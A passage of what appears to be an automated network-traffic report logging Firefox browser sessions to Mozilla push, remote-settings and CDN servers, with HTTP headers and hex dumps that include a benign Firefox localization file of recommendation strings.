                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                    If-Modified-Since: Sat, 31 Jul 2021 15:17:12 GMT
                                                                                                                                                                                                    If-None-Match: "8cfd2c8fe1fb0bc900759661d7a6ee89"
                                                                                                                                                                                                    2024-12-19 14:47:42 UTC190INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 13:24:02 GMT
                                                                                                                                                                                                    Age: 5020
                                                                                                                                                                                                    ETag: "8cfd2c8fe1fb0bc900759661d7a6ee89"
                                                                                                                                                                                                    Cache-Control: public,max-age=3600
                                                                                                                                                                                                    Alt-Svc: clear
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    1192.168.2.234089634.107.243.93443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-19 14:47:52 UTC604OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: push.services.mozilla.com
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                    Sec-WebSocket-Version: 13
                                                                                                                                                                                                    Origin: wss://push.services.mozilla.com/
                                                                                                                                                                                                    Sec-WebSocket-Protocol: push-notification
                                                                                                                                                                                                    Sec-WebSocket-Extensions: permessage-deflate
                                                                                                                                                                                                    Sec-WebSocket-Key: 7Q9OGruJUnklmGBDXI/O1Q==
                                                                                                                                                                                                    Connection: keep-alive, Upgrade
                                                                                                                                                                                                    Sec-Fetch-Dest: websocket
                                                                                                                                                                                                    Sec-Fetch-Mode: websocket
                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Upgrade: websocket
                                                                                                                                                                                                    2024-12-19 14:47:52 UTC220INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                    Content-Length: 81
                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                    date: Thu, 19 Dec 2024 14:47:52 GMT
                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2024-12-19 14:47:52 UTC81INData Raw: 7b 22 63 6f 64 65 22 3a 35 30 30 2c 22 65 72 72 6e 6f 22 3a 35 30 30 2c 22 65 72 72 6f 72 22 3a 22 41 63 74 69 78 20 57 65 62 20 65 72 72 6f 72 3a 20 57 65 62 53 6f 63 6b 65 74 20 75 70 67 72 61 64 65 20 69 73 20 65 78 70 65 63 74 65 64 22 7d
                                                                                                                                                                                                    Data Ascii: {"code":500,"errno":500,"error":"Actix Web error: WebSocket upgrade is expected"}


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    2192.168.2.233655434.149.100.209443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-19 14:47:52 UTC525OUTGET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
                                                                                                                                                                                                    Host: firefox.settings.services.mozilla.com
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                                                    Accept: application/json
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                    If-Modified-Since: Tue, 01 Jun 2021 14:28:23 GMT
                                                                                                                                                                                                    If-None-Match: "1622557703112"
                                                                                                                                                                                                    2024-12-19 14:47:53 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Content-Length: 330
                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                    Access-Control-Expose-Headers: Cache-Control, Last-Modified, Pragma, Retry-After, ETag, Expires, Content-Type, Content-Length, Alert, Backoff
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 13:53:46 GMT
                                                                                                                                                                                                    Age: 3246
                                                                                                                                                                                                    Last-Modified: Mon, 02 Dec 2024 22:25:11 GMT
                                                                                                                                                                                                    ETag: "1733178311775"
                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                    Cache-Control: public,max-age=3600
                                                                                                                                                                                                    Alt-Svc: clear
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2024-12-19 14:47:53 UTC330INData Raw: 7b 22 70 65 72 6d 69 73 73 69 6f 6e 73 22 3a 7b 7d 2c 22 64 61 74 61 22 3a 7b 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 37 66 33 32 37 36 39 64 36 62 62 34 65 38 37 35 66 35 38 63 65 62 39 65 32 66 62 66 64 63 39 62 64 36 62 38 32 33 39 37 65 63 61 37 61 34 63 35 32 33 30 62 30 37 38 36 65 36 38 66 31 37 39 38 22 2c 22 73 69 7a 65 22 3a 31 35 38 32 39 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 61 73 72 6f 75 74 65 72 2e 66 74 6c 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 6d 61 69 6e 2d 77 6f 72 6b 73 70 61 63 65 2f 6d 73 2d 6c 61 6e 67 75 61 67 65 2d 70 61 63 6b 73 2f 62 38 61 61 39 39 64 64 2d 62 32 62 36 2d 34 33 31 32 2d 38 63 34 30 2d 64 31 35 38 36 37 33 39 33 62 31 33 2e 66 74 6c 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70
                                                                                                                                                                                                    Data Ascii: {"permissions":{},"data":{"attachment":{"hash":"7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798","size":15829,"filename":"asrouter.ftl","location":"main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl","mimetype":"app


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    3192.168.2.233655834.149.100.209443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-19 14:47:54 UTC335OUTGET /v1/ HTTP/1.1
                                                                                                                                                                                                    Host: firefox.settings.services.mozilla.com
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                    2024-12-19 14:47:55 UTC510INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Content-Length: 939
                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                    Access-Control-Expose-Headers: Alert, Content-Length, Retry-After, Backoff, Content-Type
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 13:54:51 GMT
                                                                                                                                                                                                    Age: 3184
                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                    Cache-Control: public,max-age=3600
                                                                                                                                                                                                    Alt-Svc: clear
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2024-12-19 14:47:55 UTC880INData Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 39 2e 33 2e 30 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a 32 35 2c 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72
                                                                                                                                                                                                    Data Ascii: {"project_name":"Remote Settings PROD","project_version":"19.3.0","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"batch_max_requests":25,"readonly":tr
                                                                                                                                                                                                    2024-12-19 14:47:55 UTC59INData Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d
                                                                                                                                                                                                    Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    4192.168.2.233931434.117.121.53443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC412OUTGET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/1.1
                                                                                                                                                                                                    Host: firefox-settings-attachments.cdn.mozilla.net
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC680INHTTP/1.1 200 OK
                                                                                                                                                                                                    x-goog-generation: 1733172985945667
                                                                                                                                                                                                    x-goog-metageneration: 1
                                                                                                                                                                                                    x-goog-stored-content-encoding: identity
                                                                                                                                                                                                    x-goog-stored-content-length: 15829
                                                                                                                                                                                                    x-goog-hash: crc32c=Vecspg==
                                                                                                                                                                                                    x-goog-hash: md5=lsVC3sAW2ewezE3d/LqsZg==
                                                                                                                                                                                                    x-goog-storage-class: STANDARD
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 15829
                                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7n964wk9XoRZ5Aq7hmIRySaPuQAkNuxyXRK6WxiL61IAIDtpR3dNfiYVUnyoXJvteZ
                                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                                    Date: Mon, 16 Dec 2024 22:34:26 GMT
                                                                                                                                                                                                    Cache-Control: public,max-age=604800
                                                                                                                                                                                                    Age: 231211
                                                                                                                                                                                                    Last-Modified: Mon, 02 Dec 2024 20:56:25 GMT
                                                                                                                                                                                                    ETag: "96c542dec016d9ec1ecc4dddfcbaac66"
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Alt-Svc: clear
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC710INData Raw: 23 20 54 68 69 73 20 53 6f 75 72 63 65 20 43 6f 64 65 20 46 6f 72 6d 20 69 73 20 73 75 62 6a 65 63 74 20 74 6f 20 74 68 65 20 74 65 72 6d 73 20 6f 66 20 74 68 65 20 4d 6f 7a 69 6c 6c 61 20 50 75 62 6c 69 63 0a 23 20 4c 69 63 65 6e 73 65 2c 20 76 2e 20 32 2e 30 2e 20 49 66 20 61 20 63 6f 70 79 20 6f 66 20 74 68 65 20 4d 50 4c 20 77 61 73 20 6e 6f 74 20 64 69 73 74 72 69 62 75 74 65 64 20 77 69 74 68 20 74 68 69 73 0a 23 20 66 69 6c 65 2c 20 59 6f 75 20 63 61 6e 20 6f 62 74 61 69 6e 20 6f 6e 65 20 61 74 20 68 74 74 70 3a 2f 2f 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 4d 50 4c 2f 32 2e 30 2f 2e 0a 0a 23 23 20 54 68 65 73 65 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 75 73 65 64 20 61 73 20 68 65 61 64 69 6e 67 73 20 69 6e 20 74 68 65 20 72 65 63 6f 6d 6d 65 6e 64
                                                                                                                                                                                                    Data Ascii: # This Source Code Form is subject to the terms of the Mozilla Public# License, v. 2.0. If a copy of the MPL was not distributed with this# file, You can obtain one at http://mozilla.org/MPL/2.0/.## These messages are used as headings in the recommend
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 74 65 6e 73 69 6f 6e 2d 6e 65 76 65 72 2d 73 68 6f 77 2d 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 20 3d 20 44 6f 6e e2 80 99 74 20 53 68 6f 77 20 4d 65 20 54 68 69 73 20 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 0a 20 20 2e 61 63 63 65 73 73 6b 65 79 20 3d 20 53 0a 0a 63 66 72 2d 64 6f 6f 72 68 61 6e 67 65 72 2d 65 78 74 65 6e 73 69 6f 6e 2d 6c 65 61 72 6e 2d 6d 6f 72 65 2d 6c 69 6e 6b 20 3d 20 4c 65 61 72 6e 20 6d 6f 72 65 0a 0a 23 20 54 68 69 73 20 73 74 72 69 6e 67 20 69 73 20 75 73 65 64 20 6f 6e 20 61 20 6e 65 77 20 6c 69 6e 65 20 62 65 6c 6f 77 20 74 68 65 20 61 64 64 2d 6f 6e 20 6e 61 6d 65 0a 23 20 56 61 72 69 61 62 6c 65 73 3a 0a 23 20 20 20 24 6e 61 6d 65 20 28 53 74 72 69 6e 67 29 20 2d 20 41 64 64 2d 6f 6e 20 61 75 74 68 6f 72 20 6e 61 6d 65
                                                                                                                                                                                                    Data Ascii: tension-never-show-recommendation = Dont Show Me This Recommendation .accesskey = Scfr-doorhanger-extension-learn-more-link = Learn more# This string is used on a new line below the add-on name# Variables:# $name (String) - Add-on author name
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 74 61 72 73 0a 20 20 20 20 7d 0a 23 20 56 61 72 69 61 62 6c 65 73 3a 0a 23 20 20 20 24 74 6f 74 61 6c 20 28 4e 75 6d 62 65 72 29 20 2d 20 54 68 65 20 74 6f 74 61 6c 20 6e 75 6d 62 65 72 20 6f 66 20 75 73 65 72 73 20 75 73 69 6e 67 20 74 68 65 20 61 64 64 2d 6f 6e 0a 63 66 72 2d 64 6f 6f 72 68 61 6e 67 65 72 2d 65 78 74 65 6e 73 69 6f 6e 2d 74 6f 74 61 6c 2d 75 73 65 72 73 20 3d 0a 20 20 7b 20 24 74 6f 74 61 6c 20 2d 3e 0a 20 20 20 20 20 20 5b 6f 6e 65 5d 20 7b 20 24 74 6f 74 61 6c 20 7d 20 75 73 65 72 0a 20 20 20 20 20 2a 5b 6f 74 68 65 72 5d 20 7b 20 24 74 6f 74 61 6c 20 7d 20 75 73 65 72 73 0a 20 20 7d 0a 0a 23 23 20 46 69 72 65 66 6f 78 20 41 63 63 6f 75 6e 74 73 20 4d 65 73 73 61 67 65 0a 0a 63 66 72 2d 64 6f 6f 72 68 61 6e 67 65 72 2d 62 6f 6f 6b 6d
                                                                                                                                                                                                    Data Ascii: tars }# Variables:# $total (Number) - The total number of users using the add-oncfr-doorhanger-extension-total-users = { $total -> [one] { $total } user *[other] { $total } users }## Firefox Accounts Messagecfr-doorhanger-bookm
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 64 6f 6f 72 68 61 6e 67 65 72 2d 6d 69 6c 65 73 74 6f 6e 65 2d 6f 6b 2d 62 75 74 74 6f 6e 20 3d 20 53 65 65 20 41 6c 6c 0a 20 20 2e 61 63 63 65 73 73 6b 65 79 20 3d 20 53 0a 63 66 72 2d 64 6f 6f 72 68 61 6e 67 65 72 2d 6d 69 6c 65 73 74 6f 6e 65 2d 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 20 3d 20 43 6c 6f 73 65 0a 20 20 2e 61 63 63 65 73 73 6b 65 79 20 3d 20 43 0a 0a 23 23 20 44 4f 48 20 4d 65 73 73 61 67 65 0a 0a 63 66 72 2d 64 6f 6f 72 68 61 6e 67 65 72 2d 64 6f 68 2d 62 6f 64 79 20 3d 20 59 6f 75 72 20 70 72 69 76 61 63 79 20 6d 61 74 74 65 72 73 2e 20 7b 20 2d 62 72 61 6e 64 2d 73 68 6f 72 74 2d 6e 61 6d 65 20 7d 20 6e 6f 77 20 73 65 63 75 72 65 6c 79 20 72 6f 75 74 65 73 20 79 6f 75 72 20 44 4e 53 20 72 65 71 75 65 73 74 73 20 77 68 65 6e 65 76 65 72 20
                                                                                                                                                                                                    Data Ascii: doorhanger-milestone-ok-button = See All .accesskey = Scfr-doorhanger-milestone-close-button = Close .accesskey = C## DOH Messagecfr-doorhanger-doh-body = Your privacy matters. { -brand-short-name } now securely routes your DNS requests whenever
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 79 6f 75 20 70 72 6f 74 65 63 74 65 64 20 77 68 65 6e 20 62 72 6f 77 73 69 6e 67 20 69 6e 20 70 75 62 6c 69 63 20 70 6c 61 63 65 73 20 6c 69 6b 65 20 61 69 72 70 6f 72 74 73 20 61 6e 64 20 63 6f 66 66 65 65 20 73 68 6f 70 73 2e 0a 73 70 6f 74 6c 69 67 68 74 2d 70 75 62 6c 69 63 2d 77 69 66 69 2d 76 70 6e 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 20 3d 20 53 74 61 79 20 70 72 69 76 61 74 65 20 77 69 74 68 20 7b 20 2d 6d 6f 7a 69 6c 6c 61 2d 76 70 6e 2d 62 72 61 6e 64 2d 6e 61 6d 65 20 7d 0a 20 20 2e 61 63 63 65 73 73 6b 65 79 20 3d 20 53 0a 73 70 6f 74 6c 69 67 68 74 2d 70 75 62 6c 69 63 2d 77 69 66 69 2d 76 70 6e 2d 6c 69 6e 6b 20 3d 20 4e 6f 74 20 4e 6f 77 0a 20 20 2e 61 63 63 65 73 73 6b 65 79 20 3d 20 4e 0a 0a 23 23 20 45 6d 6f 74 69 76 65 20 43 6f
                                                                                                                                                                                                    Data Ascii: you protected when browsing in public places like airports and coffee shops.spotlight-public-wifi-vpn-primary-button = Stay private with { -mozilla-vpn-brand-name } .accesskey = Sspotlight-public-wifi-vpn-link = Not Now .accesskey = N## Emotive Co
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 2e 20 46 65 77 65 72 20 74 72 61 63 6b 65 72 73 2e 20 4e 6f 20 63 6f 6d 70 72 6f 6d 69 73 65 73 2e 0a 6d 72 32 30 32 32 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 75 70 64 61 74 65 2d 74 6f 61 73 74 2d 74 65 78 74 20 3d 20 54 72 79 20 74 68 65 20 6e 65 77 65 73 74 20 7b 20 2d 62 72 61 6e 64 2d 73 68 6f 72 74 2d 6e 61 6d 65 20 7d 20 6e 6f 77 2c 20 75 70 67 72 61 64 65 64 20 77 69 74 68 20 6f 75 72 20 73 74 72 6f 6e 67 65 73 74 20 61 6e 74 69 2d 74 72 61 63 6b 69 6e 67 20 70 72 6f 74 65 63 74 69 6f 6e 20 79 65 74 2e 0a 0a 23 20 54 68 69 73 20 62 75 74 74 6f 6e 20 6c 61 62 65 6c 20 77 69 6c 6c 20 62 65 20 66 69 74 74 65 64 20 69 6e 74 6f 20 61 20 6e 61 72 72 6f 77 20 66 69 78 65 64 2d 77 69 64 74 68 20 62 75 74 74 6f 6e 20 62 79 0a 23 20 57 69 6e 64 6f 77 73 2e 20
                                                                                                                                                                                                    Data Ascii: . Fewer trackers. No compromises.mr2022-background-update-toast-text = Try the newest { -brand-short-name } now, upgraded with our strongest anti-tracking protection yet.# This button label will be fitted into a narrow fixed-width button by# Windows.
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 75 20 73 61 66 65 2c 20 73 70 65 65 64 79 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 67 6f 6f 64 20 69 6e 74 65 72 6e 65 74 2e 0a 6a 75 6c 79 2d 6a 61 6d 2d 73 65 74 2d 64 65 66 61 75 6c 74 2d 70 72 69 6d 61 72 79 20 3d 20 4f 70 65 6e 20 6d 79 20 6c 69 6e 6b 73 20 77 69 74 68 20 7b 20 2d 62 72 61 6e 64 2d 73 68 6f 72 74 2d 6e 61 6d 65 20 7d 0a 66 6f 78 2d 64 6f 6f 64 6c 65 2d 70 69 6e 2d 68 65 61 64 6c 69 6e 65 20 3d 20 57 65 6c 63 6f 6d 65 20 62 61 63 6b 0a 0a 23 20 e2 80 9c 69 6e 64 69 65 e2 80 9d 20 69 73 20 73 68 6f 72 74 20 66 6f 72 20 74 68 65 20 74 65 72 6d 20 e2 80 9c 69 6e 64 65 70 65 6e 64 65 6e 74 e2 80 9d 2e 0a 23 20 49 6e 20 74 68 69 73 20 69 6e 73 74 61 6e 63 65 2c 20 66 72 65 65 20 66 72 6f 6d 20 6f 75 74 73 69 64 65 20 69 6e 66 6c 75 65
                                                                                                                                                                                                    Data Ascii: u safe, speedy access to the good internet.july-jam-set-default-primary = Open my links with { -brand-short-name }fox-doodle-pin-headline = Welcome back# indie is short for the term independent.# In this instance, free from outside influe
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 61 63 72 6f 73 73 20 61 6c 6c 20 79 6f 75 72 20 64 65 76 69 63 65 73 2e 0a 64 65 76 69 63 65 2d 6d 69 67 72 61 74 69 6f 6e 2d 66 78 61 2d 73 70 6f 74 6c 69 67 68 74 2d 68 65 61 76 79 2d 75 73 65 72 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 20 3d 20 47 65 74 20 73 74 61 72 74 65 64 0a 0a 64 65 76 69 63 65 2d 6d 69 67 72 61 74 69 6f 6e 2d 66 78 61 2d 73 70 6f 74 6c 69 67 68 74 2d 6f 6c 64 65 72 2d 64 65 76 69 63 65 2d 68 65 61 64 65 72 20 3d 20 50 65 61 63 65 20 6f 66 20 6d 69 6e 64 2c 20 66 72 6f 6d 20 7b 20 2d 62 72 61 6e 64 2d 70 72 6f 64 75 63 74 2d 6e 61 6d 65 20 7d 0a 64 65 76 69 63 65 2d 6d 69 67 72 61 74 69 6f 6e 2d 66 78 61 2d 73 70 6f 74 6c 69 67 68 74 2d 6f 6c 64 65 72 2d 64 65 76 69 63 65 2d 62 6f 64 79 20 3d 20 41 6e 20 61 63 63 6f 75 6e 74
                                                                                                                                                                                                    Data Ascii: across all your devices.device-migration-fxa-spotlight-heavy-user-primary-button = Get starteddevice-migration-fxa-spotlight-older-device-header = Peace of mind, from { -brand-product-name }device-migration-fxa-spotlight-older-device-body = An account
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 65 64 69 74 20 50 44 46 73 20 73 61 76 65 64 20 74 6f 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 2e 0a 70 64 66 2d 64 65 66 61 75 6c 74 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 73 65 74 2d 64 65 66 61 75 6c 74 2d 62 75 74 74 6f 6e 20 3d 0a 20 20 20 20 2e 6c 61 62 65 6c 20 3d 20 53 65 74 20 61 73 20 64 65 66 61 75 6c 74 0a 70 64 66 2d 64 65 66 61 75 6c 74 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 64 65 63 6c 69 6e 65 2d 62 75 74 74 6f 6e 20 3d 0a 20 20 20 20 2e 6c 61 62 65 6c 20 3d 20 4e 6f 74 20 6e 6f 77 0a 0a 23 23 20 4c 61 75 6e 63 68 20 6f 6e 20 6c 6f 67 69 6e 20 69 6e 66 6f 62 61 72 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 0a 0a 6c 61 75 6e 63 68 2d 6f 6e 2d 6c 6f 67 69 6e 2d 69 6e 66 6f 62 61 72 2d 6d 65 73 73 61 67 65 20 3d 20 3c 73 74 72 6f 6e 67 3e
                                                                                                                                                                                                    Data Ascii: edit PDFs saved to your computer.pdf-default-notification-set-default-button = .label = Set as defaultpdf-default-notification-decline-button = .label = Not now## Launch on login infobar notificationlaunch-on-login-infobar-message = <strong>
                                                                                                                                                                                                    2024-12-19 14:47:57 UTC1390INData Raw: 74 6c 65 20 3d 20 4b 65 65 70 20 70 65 73 6b 79 20 74 72 61 63 6b 65 72 73 20 6f 66 66 20 79 6f 75 72 20 74 61 69 6c 0a 74 61 69 6c 2d 66 6f 78 2d 73 70 6f 74 6c 69 67 68 74 2d 73 75 62 74 69 74 6c 65 20 3d 20 53 61 79 20 67 6f 6f 64 62 79 65 20 74 6f 20 61 6e 6e 6f 79 69 6e 67 20 61 64 20 74 72 61 63 6b 65 72 73 20 61 6e 64 20 73 65 74 74 6c 65 20 69 6e 74 6f 20 61 20 73 61 66 65 72 2c 20 73 70 65 65 64 79 20 69 6e 74 65 72 6e 65 74 20 65 78 70 65 72 69 65 6e 63 65 2e 0a 74 61 69 6c 2d 66 6f 78 2d 73 70 6f 74 6c 69 67 68 74 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 20 3d 20 4f 70 65 6e 20 6d 79 20 6c 69 6e 6b 73 20 77 69 74 68 20 7b 20 2d 62 72 61 6e 64 2d 73 68 6f 72 74 2d 6e 61 6d 65 20 7d 0a 74 61 69 6c 2d 66 6f 78 2d 73 70 6f 74 6c 69 67 68 74 2d
                                                                                                                                                                                                    Data Ascii: tle = Keep pesky trackers off your tailtail-fox-spotlight-subtitle = Say goodbye to annoying ad trackers and settle into a safer, speedy internet experience.tail-fox-spotlight-primary-button = Open my links with { -brand-short-name }tail-fox-spotlight-


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    5192.168.2.234090634.107.243.93443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-19 14:48:00 UTC604OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: push.services.mozilla.com
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                    Sec-WebSocket-Version: 13
                                                                                                                                                                                                    Origin: wss://push.services.mozilla.com/
                                                                                                                                                                                                    Sec-WebSocket-Protocol: push-notification
                                                                                                                                                                                                    Sec-WebSocket-Extensions: permessage-deflate
                                                                                                                                                                                                    Sec-WebSocket-Key: /0LgGlndYTgjJs7cCfzo7w==
                                                                                                                                                                                                    Connection: keep-alive, Upgrade
                                                                                                                                                                                                    Sec-Fetch-Dest: websocket
                                                                                                                                                                                                    Sec-Fetch-Mode: websocket
                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Upgrade: websocket
                                                                                                                                                                                                    2024-12-19 14:48:00 UTC220INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                    Content-Length: 81
                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                    date: Thu, 19 Dec 2024 14:48:00 GMT
                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                    Connection: close
